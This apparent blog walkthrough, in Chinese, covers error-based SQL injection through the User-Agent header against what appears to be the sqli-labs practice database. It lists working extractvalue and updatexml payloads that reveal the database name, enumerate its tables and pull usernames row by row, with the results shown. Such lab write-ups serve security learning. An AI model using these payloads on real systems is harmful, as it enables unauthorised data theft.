目录
1.爆破当前数据库
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0' and extractvalue(1,concat(0x7e,(select database()),0x7e))||'
查询到数据库名 security
2.爆破所有表名
-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)||'
查询到表名:emails、referers、uagents、users
3.爆破users第三行数据
-1' and updatexml(1,concat(0x7e,(select username from security.users limit 2,1),0x7e ),1)--'
-1' and updatexml(1,concat(0x7e,(select username from security.users limit 1,1),0x7e ),1)--'
-1' and updatexml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e ),1)--'
查询到id=3的用户名为 Dummy
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125841263